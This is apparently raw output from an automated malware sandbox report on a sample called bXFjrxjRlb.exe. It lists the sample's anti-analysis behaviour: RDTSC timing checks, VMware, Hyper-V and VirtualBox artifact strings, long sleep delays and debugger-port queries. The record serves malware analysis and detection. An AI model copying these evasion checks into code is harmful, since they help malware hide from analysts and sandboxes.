Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000003D98E4 second address: 00000000003D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000003D9B5E second address: 00000000003D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 5048	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 4112	Thread sleep count: 138 > 30	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 1992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 6364	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4532	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4532	Thread sleep time: -102000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 3452	Thread sleep time: -110000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000002.00000000.385038972.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.384962824.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmware svga
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: cmd.txtQEMUqemu
Source: explorer.exe, 00000002.00000002.713752043.0000000006300000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000002.00000002.713961685.0000000006420000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: virtual-vmware pointing device
Source: bXFjrxjRlb.exe, 00000000.00000002.356031561.0000000000939000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000002.00000002.713961685.0000000006420000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000002.00000000.384962824.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmp	Binary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: explorer.exe, 00000002.00000000.384844783.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmp	Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.384844783.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.385038972.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 1_2_0040ACD0 LdrLoadDll,

1_2_0040ACD0

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]	1_2_01343D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133AD30 mov eax, dword ptr fs:[00000030h]	1_2_0133AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FE539 mov eax, dword ptr fs:[00000030h]	1_2_013FE539
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136513A mov eax, dword ptr fs:[00000030h]	1_2_0136513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136513A mov eax, dword ptr fs:[00000030h]	1_2_0136513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013BA537 mov eax, dword ptr fs:[00000030h]	1_2_013BA537
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01364D3B mov eax, dword ptr fs:[00000030h]	1_2_01364D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01364D3B mov eax, dword ptr fs:[00000030h]	1_2_01364D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01364D3B mov eax, dword ptr fs:[00000030h]	1_2_01364D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01354120 mov eax, dword ptr fs:[00000030h]	1_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01354120 mov eax, dword ptr fs:[00000030h]	1_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01354120 mov eax, dword ptr fs:[00000030h]	1_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01354120 mov eax, dword ptr fs:[00000030h]	1_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01354120 mov ecx, dword ptr fs:[00000030h]	1_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01339100 mov eax, dword ptr fs:[00000030h]	1_2_01339100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01339100 mov eax, dword ptr fs:[00000030h]	1_2_01339100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01339100 mov eax, dword ptr fs:[00000030h]	1_2_01339100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133B171 mov eax, dword ptr fs:[00000030h]	1_2_0133B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133B171 mov eax, dword ptr fs:[00000030h]	1_2_0133B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135C577 mov eax, dword ptr fs:[00000030h]	1_2_0135C577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135C577 mov eax, dword ptr fs:[00000030h]	1_2_0135C577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133C962 mov eax, dword ptr fs:[00000030h]	1_2_0133C962
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01357D50 mov eax, dword ptr fs:[00000030h]	1_2_01357D50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135B944 mov eax, dword ptr fs:[00000030h]	1_2_0135B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135B944 mov eax, dword ptr fs:[00000030h]	1_2_0135B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01408D34 mov eax, dword ptr fs:[00000030h]	1_2_01408D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01373D43 mov eax, dword ptr fs:[00000030h]	1_2_01373D43
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B3540 mov eax, dword ptr fs:[00000030h]	1_2_013B3540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01361DB5 mov eax, dword ptr fs:[00000030h]	1_2_01361DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01361DB5 mov eax, dword ptr fs:[00000030h]	1_2_01361DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01361DB5 mov eax, dword ptr fs:[00000030h]	1_2_01361DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B51BE mov eax, dword ptr fs:[00000030h]	1_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B51BE mov eax, dword ptr fs:[00000030h]	1_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B51BE mov eax, dword ptr fs:[00000030h]	1_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B51BE mov eax, dword ptr fs:[00000030h]	1_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013661A0 mov eax, dword ptr fs:[00000030h]	1_2_013661A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013661A0 mov eax, dword ptr fs:[00000030h]	1_2_013661A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013635A1 mov eax, dword ptr fs:[00000030h]	1_2_013635A1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B69A6 mov eax, dword ptr fs:[00000030h]	1_2_013B69A6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362990 mov eax, dword ptr fs:[00000030h]	1_2_01362990
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136FD9B mov eax, dword ptr fs:[00000030h]	1_2_0136FD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136FD9B mov eax, dword ptr fs:[00000030h]	1_2_0136FD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136A185 mov eax, dword ptr fs:[00000030h]	1_2_0136A185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0135C182 mov eax, dword ptr fs:[00000030h]	1_2_0135C182
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362581 mov eax, dword ptr fs:[00000030h]	1_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362581 mov eax, dword ptr fs:[00000030h]	1_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362581 mov eax, dword ptr fs:[00000030h]	1_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01362581 mov eax, dword ptr fs:[00000030h]	1_2_01362581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]	1_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]	1_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]	1_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]	1_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]	1_2_01332D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013E8DF1 mov eax, dword ptr fs:[00000030h]	1_2_013E8DF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0133B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0133B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0133B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0133B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013C41E8 mov eax, dword ptr fs:[00000030h]	1_2_013C41E8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0134D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0134D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FFDE2 mov eax, dword ptr fs:[00000030h]	1_2_013FFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FFDE2 mov eax, dword ptr fs:[00000030h]	1_2_013FFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FFDE2 mov eax, dword ptr fs:[00000030h]	1_2_013FFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013FFDE2 mov eax, dword ptr fs:[00000030h]	1_2_013FFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014005AC mov eax, dword ptr fs:[00000030h]	1_2_014005AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_014005AC mov eax, dword ptr fs:[00000030h]	1_2_014005AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]	1_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]	1_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]	1_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6DC9 mov ecx, dword ptr fs:[00000030h]	1_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]	1_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]	1_2_013B6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136BC2C mov eax, dword ptr fs:[00000030h]	1_2_0136BC2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]	1_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]	1_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]	1_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]	1_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]	1_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134B02A mov eax, dword ptr fs:[00000030h]	1_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134B02A mov eax, dword ptr fs:[00000030h]	1_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134B02A mov eax, dword ptr fs:[00000030h]	1_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0134B02A mov eax, dword ptr fs:[00000030h]	1_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B7016 mov eax, dword ptr fs:[00000030h]	1_2_013B7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B7016 mov eax, dword ptr fs:[00000030h]	1_2_013B7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B7016 mov eax, dword ptr fs:[00000030h]	1_2_013B7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6C0A mov eax, dword ptr fs:[00000030h]	1_2_013B6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6C0A mov eax, dword ptr fs:[00000030h]	1_2_013B6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6C0A mov eax, dword ptr fs:[00000030h]	1_2_013B6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013B6C0A mov eax, dword ptr fs:[00000030h]	1_2_013B6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01401074 mov eax, dword ptr fs:[00000030h]	1_2_01401074
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]	1_2_013F1C06
